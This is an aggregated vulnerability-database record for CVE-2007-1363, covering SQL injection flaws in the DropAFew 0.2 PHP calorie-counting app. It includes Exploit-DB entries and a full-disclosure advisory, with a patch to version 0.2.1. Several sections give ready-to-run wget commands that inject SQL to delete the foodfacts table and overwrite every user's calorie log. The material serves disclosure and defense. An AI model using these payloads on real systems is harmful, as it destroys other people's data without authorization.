ID CVE-2007-1363 Type cve Reporter cve@mitre.org Modified 2017-07-29T01:30:00
Description
Multiple SQL injection vulnerabilities in DropAFew before 0.2.1 allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in the delete action in (a) search.php or (b) search-pda.php, or the (2) calories parameter in a save action in editlogcal.php.
{"exploitdb": [{"lastseen": "2016-02-03T11:13:44", "bulletinFamily": "exploit", "description": "DropAFew 0.2 search.php delete Action id Parameter SQL Injection. CVE-2007-1363. Webapps exploit for php platform", "modified": "2007-04-10T00:00:00", "published": "2007-04-10T00:00:00", "id": "EDB-ID:29832", "href": "https://www.exploit-db.com/exploits/29832/", "type": "exploitdb", "title": "DropAFew 0.2 - search.php delete Action id Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/23400/info\r\n \r\nDropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.\r\n \r\nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.\r\n \r\nThese issues affect DropAFew 0.2; prior versions may also be affected.\r\n \r\n# delete foodfacts table\r\nwget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29832/"}, {"lastseen": "2016-02-03T11:13:52", "bulletinFamily": "exploit", "description": "DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection. CVE-2007-1363. Webapps exploit for php platform", "modified": "2007-04-10T00:00:00", "published": "2007-04-10T00:00:00", "id": "EDB-ID:29833", "href": "https://www.exploit-db.com/exploits/29833/", "type": "exploitdb", "title": "DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/23400/info\r\n \r\nDropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.\r\n \r\nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.\r\n \r\nThese issues affect DropAFew 0.2; prior versions may also be affected.\r\n\r\nwget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*'\r\nhttp://[target]/calorie/editlogcal.php ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29833/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 0.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.dropafew.com/\nVendor Specific News/Changelog Entry: http://www.dropafew.com/sphpblog/index.php?entry=entry070403-224437\n[Secunia Advisory ID:24861](https://secuniaresearch.flexerasoftware.com/advisories/24861/)\n[Related OSVDB ID: 34923](https://vulners.com/osvdb/OSVDB:34923)\n[Related OSVDB ID: 34921](https://vulners.com/osvdb/OSVDB:34921)\n[Related OSVDB ID: 34924](https://vulners.com/osvdb/OSVDB:34924)\n[Related OSVDB ID: 34925](https://vulners.com/osvdb/OSVDB:34925)\n[Related OSVDB ID: 34926](https://vulners.com/osvdb/OSVDB:34926)\nOther Advisory URL: https://www.cynops.de/advisories/CVE-2007-1363.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-04/0355.html\nISS X-Force ID: 33560\n[CVE-2007-1363](https://vulners.com/cve/CVE-2007-1363)\nBugtraq ID: 23400\n", "modified": "2007-04-10T09:04:03", "published": "2007-04-10T09:04:03", "href": "https://vulners.com/osvdb/OSVDB:34922", "id": "OSVDB:34922", "title": "DropAFew search-pda.php delete Action id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 0.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.dropafew.com/\nVendor Specific News/Changelog Entry: http://www.dropafew.com/sphpblog/index.php?entry=entry070403-224437\n[Secunia Advisory ID:24861](https://secuniaresearch.flexerasoftware.com/advisories/24861/)\n[Related OSVDB ID: 34922](https://vulners.com/osvdb/OSVDB:34922)\n[Related OSVDB ID: 34921](https://vulners.com/osvdb/OSVDB:34921)\n[Related OSVDB ID: 34924](https://vulners.com/osvdb/OSVDB:34924)\n[Related OSVDB ID: 34925](https://vulners.com/osvdb/OSVDB:34925)\n[Related OSVDB ID: 34926](https://vulners.com/osvdb/OSVDB:34926)\nOther Advisory URL: https://www.cynops.de/advisories/CVE-2007-1363.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-04/0355.html\nISS X-Force ID: 33560\n[CVE-2007-1363](https://vulners.com/cve/CVE-2007-1363)\nBugtraq ID: 23400\n", "modified": "2007-04-10T09:04:03", "published": "2007-04-10T09:04:03", "href": "https://vulners.com/osvdb/OSVDB:34923", "id": "OSVDB:34923", "title": "DropAFew editlogcal.php save Action calories Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 0.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.dropafew.com/\nVendor Specific News/Changelog Entry: http://www.dropafew.com/sphpblog/index.php?entry=entry070403-224437\n[Secunia Advisory ID:24861](https://secuniaresearch.flexerasoftware.com/advisories/24861/)\n[Related OSVDB ID: 34922](https://vulners.com/osvdb/OSVDB:34922)\n[Related OSVDB ID: 34923](https://vulners.com/osvdb/OSVDB:34923)\n[Related OSVDB ID: 34924](https://vulners.com/osvdb/OSVDB:34924)\n[Related OSVDB ID: 34925](https://vulners.com/osvdb/OSVDB:34925)\n[Related OSVDB ID: 34926](https://vulners.com/osvdb/OSVDB:34926)\nOther Advisory URL: https://www.cynops.de/advisories/CVE-2007-1363.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-04/0355.html\nISS X-Force ID: 33560\n[CVE-2007-1363](https://vulners.com/cve/CVE-2007-1363)\nBugtraq ID: 23400\n", "modified": "2007-04-10T09:04:03", "published": "2007-04-10T09:04:03", "href": "https://vulners.com/osvdb/OSVDB:34921", "id": "OSVDB:34921", "title": "DropAFew search.php delete Action id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:59", "bulletinFamily": "exploit", "description": "", "modified": "2007-04-11T00:00:00", "published": "2007-04-11T00:00:00", "href": "https://packetstormsecurity.com/files/55830/AKLINK-SA-2007-002.txt.html", "id": "PACKETSTORM:55830", "type": "packetstorm", "title": "AKLINK-SA-2007-002.txt", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n============================================ \n||| Security Advisory AKLINK-SA-2007-002 ||| \n||| CVE-2007-1363 (CVE candidate) ||| \n||| CVE-2007-1364 (CVE candidate) ||| \n============================================ \n \nDropAFew - Multiple vulnerabilities (SQL injection, authorization issue) \n======================================================================== \n \nDate released: 10.04.2007 \nDate reported: 07.03.2007 \n$Revision: 1.1 $ \n \nby Alexander Klink \nCynops GmbH \na.klink@cynops.de \nhttps://www.cynops.de/advisories/CVE-2007-1363.txt \n(S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1363-signed.txt) \nhttps://www.klink.name/security/aklink-sa-2007-002-dropafew-sqlinjection.txt \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1363 \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1364 \n \nVendor: Chris Bratlien (Open Source) \nProduct: DropAFew - a multi-user calorie counting program using PHP \nWebsite: http://www.dropafew.com \nVulnerability: SQL injection attack, authorization issues \nClass: remote \nStatus: patched \nSeverity: moderate (database corruption and some information disclosure) \nReleases known to be affected: 0.2 \nReleases known NOT to be affected: 0.2.1 \n \n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \nOverview: \n \nSQL injection is possible in different places which may lead to the \ndeletion or corruption of the two most important database tables of \nthe application. \nThe vulnerability works without query stacking and with magic_quotes_gpw \nset to on. \n \n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \nTechnical details: \n \nAn SQL injection is present in search.php and search-pda.php on the \ndelete action. Setting id for example to \"1 OR id > 0 --\" deletes the \nfoodfacts table completely. \nIn editlogcal.php, the save action allows for an SQL injection into \nan UPDATE statement via the calories variable. Setting calories for \nexample to \"1000 WHERE id > 0 /*\" corrupts the logcal database reducing \nit to the same entry (so it looks like everybody keeps eating the same \nthing again and again). \nIn editlogcal.php, the id parameter is not checked for authorization, \nso it is possible for a user to see all logged calories for all users \n(without knowing who ate what, though). \nFurthermore, the links.php allows a user to add publicly viewable links \nto everyones link page, which a user can not remove, which might be \na possibility for spam. \n \n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \nExploit: \n \n# create new user \nwget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php \n# delete foodfacts table \nwget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php \n# make everyone have eaten 1000 strawberries, but hey, they were only 10 \n# calories ... \nwget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' http://[target]/calorie/editlogcal.php \n \n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \nWorkaround: \n \nFiltering the requests, restricting access to the application to \ntrusted users only. \n \n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \nCommunication: \n \n* 07.03.2007: Problem reported to author \n* 07.03.2007: Vendor replies and confirms the problem, presents ideas \nfor a solution \n* 03.04.2007: Contacted vendor to check back on status \n* 03.04.2007: Vendor responds with updated version 0.2.1 \n \n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \nSolution: \n \nUpdate to version 0.2.1 (http://dropafew.com/download/dropafew-0.2.1.zip) \n \n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \nCredit: \n \nAlexander Klink, Cynops GmbH (discovery and exploit development) \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.5 (GNU/Linux) \n \niD8DBQFGGqWp8Q3kKmNSxUURAoaKAKCWPDyFVZnZnw7J6DCr4PXp/hwFMACggEos \nUR4k+AOgSkfFGL8HYIBoyjY= \n=nelw \n-----END PGP SIGNATURE----- \n \n-- \nDipl.-Math. Alexander Klink | IT-Security Engineer | a.klink@cynops.de \nmobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de \n----------------------------+----------------------+--------------------- \nHRB 7833, Amtsgericht | USt-Id: DE 213094986 | Gesch\u00e4ftsf\u00fchrer: \nBad Homburg v. d. H\u00f6he | | Martin Bartosch \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/55830/AKLINK-SA-2007-002.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n============================================\r\n||| Security Advisory AKLINK-SA-2007-002 |||\r\n||| CVE-2007-1363 (CVE candidate) |||\r\n||| CVE-2007-1364 (CVE candidate) |||\r\n============================================\r\n\r\nDropAFew - Multiple vulnerabilities (SQL injection, authorization issue)\r\n========================================================================\r\n\r\nDate released: 10.04.2007\r\nDate reported: 07.03.2007\r\n$Revision: 1.1 $\r\n\r\nby Alexander Klink\r\n Cynops GmbH\r\n a.klink@cynops.de\r\n https://www.cynops.de/advisories/CVE-2007-1363.txt\r\n (S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1363-signed.txt)\r\n https://www.klink.name/security/aklink-sa-2007-002-dropafew-sqlinjection.txt\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1363\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1364\r\n\r\nVendor: Chris Bratlien (Open Source)\r\nProduct: DropAFew - a multi-user calorie counting program using PHP\r\nWebsite: http://www.dropafew.com\r\nVulnerability: SQL injection attack, authorization issues\r\nClass: remote\r\nStatus: patched \r\nSeverity: moderate (database corruption and some information disclosure)\r\nReleases known to be affected: 0.2\r\nReleases known NOT to be affected: 0.2.1 \r\n\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\nOverview:\r\n\r\nSQL injection is possible in different places which may lead to the\r\ndeletion or corruption of the two most important database tables of\r\nthe application.\r\nThe vulnerability works without query stacking and with magic_quotes_gpw\r\nset to on.\r\n\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\nTechnical details:\r\n\r\nAn SQL injection is present in search.php and search-pda.php on the\r\ndelete action. Setting id for example to "1 OR id > 0 --" deletes the\r\nfoodfacts table completely.\r\nIn editlogcal.php, the save action allows for an SQL injection into\r\nan UPDATE statement via the calories variable. Setting calories for\r\nexample to "1000 WHERE id > 0 /*" corrupts the logcal database reducing\r\nit to the same entry (so it looks like everybody keeps eating the same\r\nthing again and again).\r\nIn editlogcal.php, the id parameter is not checked for authorization,\r\nso it is possible for a user to see all logged calories for all users\r\n(without knowing who ate what, though).\r\nFurthermore, the links.php allows a user to add publicly viewable links\r\nto everyones link page, which a user can not remove, which might be\r\na possibility for spam.\r\n\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\nExploit:\r\n\r\n# create new user\r\nwget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php\r\n# delete foodfacts table\r\nwget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php\r\n# make everyone have eaten 1000 strawberries, but hey, they were only 10\r\n# calories ...\r\nwget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' http://[target]/calorie/editlogcal.php\r\n\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\nWorkaround:\r\n\r\nFiltering the requests, restricting access to the application to\r\ntrusted users only.\r\n\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\nCommunication:\r\n\r\n* 07.03.2007: Problem reported to author\r\n* 07.03.2007: Vendor replies and confirms the problem, presents ideas\r\n for a solution\r\n* 03.04.2007: Contacted vendor to check back on status\r\n* 03.04.2007: Vendor responds with updated version 0.2.1\r\n\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\nSolution:\r\n\r\nUpdate to version 0.2.1 (http://dropafew.com/download/dropafew-0.2.1.zip)\r\n\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\nCredit:\r\n\r\nAlexander Klink, Cynops GmbH (discovery and exploit development)\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.5 (GNU/Linux)\r\n\r\niD8DBQFGGqWp8Q3kKmNSxUURAoaKAKCWPDyFVZnZnw7J6DCr4PXp/hwFMACggEos\r\nUR4k+AOgSkfFGL8HYIBoyjY=\r\n=nelw\r\n-----END PGP SIGNATURE-----\r\n\r\n-- \r\nDipl.-Math. Alexander Klink | IT-Security Engineer | a.klink@cynops.de\r\n mobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de\r\n----------------------------+----------------------+---------------------\r\n HRB 7833, Amtsgericht | USt-Id: DE 213094986 | Geschaftsfuhrer:\r\n Bad Homburg v. d. Hohe | | Martin Bartosch\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2007-04-11T00:00:00", "published": "2007-04-11T00:00:00", "id": "SECURITYVULNS:DOC:16650", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16650", "title": "[Full-disclosure] DropAFew - SQL injection and authorization issues", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-04-11T00:00:00", "published": "2007-04-11T00:00:00", "id": "SECURITYVULNS:VULN:7564", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7564", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
